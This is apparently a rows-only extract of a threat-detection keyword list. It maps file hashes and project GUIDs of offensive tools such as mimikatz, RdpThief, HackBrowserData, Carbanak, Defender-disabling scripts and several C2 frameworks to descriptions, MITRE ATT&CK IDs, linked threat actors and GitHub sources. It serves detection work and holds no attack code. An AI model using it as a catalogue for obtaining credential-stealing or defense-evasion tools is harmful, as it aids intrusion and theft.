"*d0844ed23aea55010cdfbca9d818cbf3baaa222ee8b30281b3534e60146583ff*",".{0,1000}d0844ed23aea55010cdfbca9d818cbf3baaa222ee8b30281b3534e60146583ff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39369"
"*d085bf919dd44d0f756996237cc655eb5569ee00dc91ae02a7041ea369acc4c6*",".{0,1000}d085bf919dd44d0f756996237cc655eb5569ee00dc91ae02a7041ea369acc4c6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39370"
"*d08e48fbfffffa54fb689d612cfa21a1a0e906ade2bca23bd12f89ce827bc0df*",".{0,1000}d08e48fbfffffa54fb689d612cfa21a1a0e906ade2bca23bd12f89ce827bc0df.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","39372"
"*d090bea299c6fb0956ce4a6450d0bfe1e3e0aa952a67b718f26e3668e41aac56*",".{0,1000}d090bea299c6fb0956ce4a6450d0bfe1e3e0aa952a67b718f26e3668e41aac56.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","0","#filehash","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","39373"
"*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*",".{0,1000}d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","39374"
"*d0979cde89fa887b2d61b7d225f433e96106d4735cb92069c84ccf69405aa74a*",".{0,1000}d0979cde89fa887b2d61b7d225f433e96106d4735cb92069c84ccf69405aa74a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39375"
"*d09ccee4-pass-word-0000-98677e2356fd*",".{0,1000}d09ccee4\-pass\-word\-0000\-98677e2356fd.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","39376"
"*d0a3532c8dca1cb65fbdf7f28818eb5543a523c7eeebb8cfc838862518a96b51*",".{0,1000}d0a3532c8dca1cb65fbdf7f28818eb5543a523c7eeebb8cfc838862518a96b51.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39377"
"*d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e*",".{0,1000}d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39380"
"*d0a9150d-b6a4-4b17-a325-e3a24fed0aa9*",".{0,1000}d0a9150d\-b6a4\-4b17\-a325\-e3a24fed0aa9.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#GUIDproject","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","39381"
"*d0a965003f74317e82e25f5c479a66acb8048a470800be03f6cd8e413f5fd598*",".{0,1000}d0a965003f74317e82e25f5c479a66acb8048a470800be03f6cd8e413f5fd598.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","39382"
"*d0aa252c1cf8232ad1fe5c59ac94962ba6d0790c333a960d3c757fb9a18f98d8*",".{0,1000}d0aa252c1cf8232ad1fe5c59ac94962ba6d0790c333a960d3c757fb9a18f98d8.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39383"
"*d0b6d53a899a02e580e7040a2c442ec872d3edc1c6d8eb4e82b95b0bf2e70943*",".{0,1000}d0b6d53a899a02e580e7040a2c442ec872d3edc1c6d8eb4e82b95b0bf2e70943.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","39385"
"*d0c376cd617a39f0aae2ad7dd76c689025f894e3682c6e192ed6ff984ae81fd7*",".{0,1000}d0c376cd617a39f0aae2ad7dd76c689025f894e3682c6e192ed6ff984ae81fd7.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39387"
"*d0c384c27b210cefdf2e15e0b9a66a03e5a552af78f3e05bcbf5de5574b6f475*",".{0,1000}d0c384c27b210cefdf2e15e0b9a66a03e5a552af78f3e05bcbf5de5574b6f475.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39388"
"*D0CBA7AF-93F5-378A-BB11-2A5D9AA9C4D7*",".{0,1000}D0CBA7AF\-93F5\-378A\-BB11\-2A5D9AA9C4D7.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","39390"
"*D0CBA7AF-93F5-378A-BB11-2A5D9AA9C4D7*",".{0,1000}D0CBA7AF\-93F5\-378A\-BB11\-2A5D9AA9C4D7.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","39391"
"*d0d03a0ae4722535a0e1d5d0c8385ce42015511e68d960fadef4b4eaf5942feb*",".{0,1000}d0d03a0ae4722535a0e1d5d0c8385ce42015511e68d960fadef4b4eaf5942feb.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","39392"
"*d0d44151ff0e68bd7ec125589185f2a056d0424a65c49b5a23a7633762884733*",".{0,1000}d0d44151ff0e68bd7ec125589185f2a056d0424a65c49b5a23a7633762884733.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39394"
"*D0DF8E42-3CED-4A5F-BB28-0C348B56BC79*",".{0,1000}D0DF8E42\-3CED\-4A5F\-BB28\-0C348B56BC79.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","39397"
"*d0eb83464046e448c2cc8681cbcc6de557c539fd307ce46a5734dfbfe6b7be69*",".{0,1000}d0eb83464046e448c2cc8681cbcc6de557c539fd307ce46a5734dfbfe6b7be69.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39399"
"*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*",".{0,1000}d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","39400"
"*d0ec66b90af2a1a10aacf8c8130d88cc0886235d5e74df5f504d01f9e4173a93*",".{0,1000}d0ec66b90af2a1a10aacf8c8130d88cc0886235d5e74df5f504d01f9e4173a93.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39401"
"*d0f189f26ac306b46efc221359e27629eb76c54a4cf0cec4e3731ab306bee0af*",".{0,1000}d0f189f26ac306b46efc221359e27629eb76c54a4cf0cec4e3731ab306bee0af.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","39402"
"*d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8*",".{0,1000}d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","39404"
"*d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8*",".{0,1000}d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","39405"
"*d0ff7aed5b06c8bc511a222be3c1f6fe145b253b2fa4ffe62d72e5479f5a918e*",".{0,1000}d0ff7aed5b06c8bc511a222be3c1f6fe145b253b2fa4ffe62d72e5479f5a918e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39406"
"*d101dd8673efe4f892eaf2124dc57be97140bdab7b2f79f8180ca6869a1eef3f*",".{0,1000}d101dd8673efe4f892eaf2124dc57be97140bdab7b2f79f8180ca6869a1eef3f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","39407"
"*d1028ca3bb682ecbf66fcad2425aa322cf5214f6e123a145695047a03ec762a2*",".{0,1000}d1028ca3bb682ecbf66fcad2425aa322cf5214f6e123a145695047a03ec762a2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39408"
"*d10833b7d54745c35eec76ce48c1d8a4d90a9455bcd8b81cacdc95b9304b3be3*",".{0,1000}d10833b7d54745c35eec76ce48c1d8a4d90a9455bcd8b81cacdc95b9304b3be3.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","#filehash","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","39410"
"*d10af443de7fe12f8aa50bc39d5e86d25ff8b789bf8763a61f9f84cf97bd0f53*",".{0,1000}d10af443de7fe12f8aa50bc39d5e86d25ff8b789bf8763a61f9f84cf97bd0f53.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","39411"
"*d10b6cff8410fa9d9a9d9253c19fe6968fa5ca8f0de3b496648368e07b468a20*",".{0,1000}d10b6cff8410fa9d9a9d9253c19fe6968fa5ca8f0de3b496648368e07b468a20.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39412"
"*D116BEC7-8DEF-4FCE-BF84-C8504EF4E481*",".{0,1000}D116BEC7\-8DEF\-4FCE\-BF84\-C8504EF4E481.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","#GUIDproject","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","39414"
"*d135953447b64497e94928624cc0d3b6e42f32673a4cd53215f0ae6861129f99*",".{0,1000}d135953447b64497e94928624cc0d3b6e42f32673a4cd53215f0ae6861129f99.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","39420"
"*d13f87b9eaf09ef95778b2f1469aa34d03186d127c8f73c73299957d386c78d1*",".{0,1000}d13f87b9eaf09ef95778b2f1469aa34d03186d127c8f73c73299957d386c78d1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","39421"
"*d14078723dbc8e252596c6528cee47eb889bf38f29bc69d04e23634ece8c2b2d*",".{0,1000}d14078723dbc8e252596c6528cee47eb889bf38f29bc69d04e23634ece8c2b2d.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","39422"
"*d1439c78d82d7d5cb4c2eb3ff130ebe381ab5bb0eeaf369a02abc16e61ea7eca*",".{0,1000}d1439c78d82d7d5cb4c2eb3ff130ebe381ab5bb0eeaf369a02abc16e61ea7eca.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39424"
"*d14447f41d11e0ed192d9161a60cee139fe8b01d921bbdff56abc01a5a653161*",".{0,1000}d14447f41d11e0ed192d9161a60cee139fe8b01d921bbdff56abc01a5a653161.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39425"
"*d14447f41d11e0ed192d9161a60cee139fe8b01d921bbdff56abc01a5a653161*",".{0,1000}d14447f41d11e0ed192d9161a60cee139fe8b01d921bbdff56abc01a5a653161.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39426"
"*d14884d8a7f74e96a4450e1b1e65636b3a2810274963e4a6eb28e161effe1216*",".{0,1000}d14884d8a7f74e96a4450e1b1e65636b3a2810274963e4a6eb28e161effe1216.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","39428"
"*d14884d8a7f74e96a4450e1b1e65636b3a2810274963e4a6eb28e161effe1216*",".{0,1000}d14884d8a7f74e96a4450e1b1e65636b3a2810274963e4a6eb28e161effe1216.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#filehash","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","39429"
"*d14b86691ed977fd4c29e0c98bac637bffc86c46e83768f73432eb26def0bcaa*",".{0,1000}d14b86691ed977fd4c29e0c98bac637bffc86c46e83768f73432eb26def0bcaa.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39430"
"*d14be0c5477fc937b2cc00367931e1181d8897ce98a560cff48e0939840a096b*",".{0,1000}d14be0c5477fc937b2cc00367931e1181d8897ce98a560cff48e0939840a096b.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","0","#filehash","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","39431"
"*d15d3424eed0a69503213f2c7261d831f676b51383f4a10924bee81ce0e47d49*",".{0,1000}d15d3424eed0a69503213f2c7261d831f676b51383f4a10924bee81ce0e47d49.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","39432"
"*d162ba6606bbb0ac0485c82b28cfa68132769c8c19fc92cc65b3aa2f8deafe87*",".{0,1000}d162ba6606bbb0ac0485c82b28cfa68132769c8c19fc92cc65b3aa2f8deafe87.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39433"
"*d162d2e96da627fac5a93d5e6faf379aff092bbd*",".{0,1000}d162d2e96da627fac5a93d5e6faf379aff092bbd.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","39434"
"*d163f8bb6aef4d8acca03431abdee92c3d104b2ae7dea5082d1a6b579e05dc77*",".{0,1000}d163f8bb6aef4d8acca03431abdee92c3d104b2ae7dea5082d1a6b579e05dc77.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39435"
"*d169a3057a62c9cc881c25e8f78c915c2c967a7c537a270239c87a1cad44b76e*",".{0,1000}d169a3057a62c9cc881c25e8f78c915c2c967a7c537a270239c87a1cad44b76e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39438"
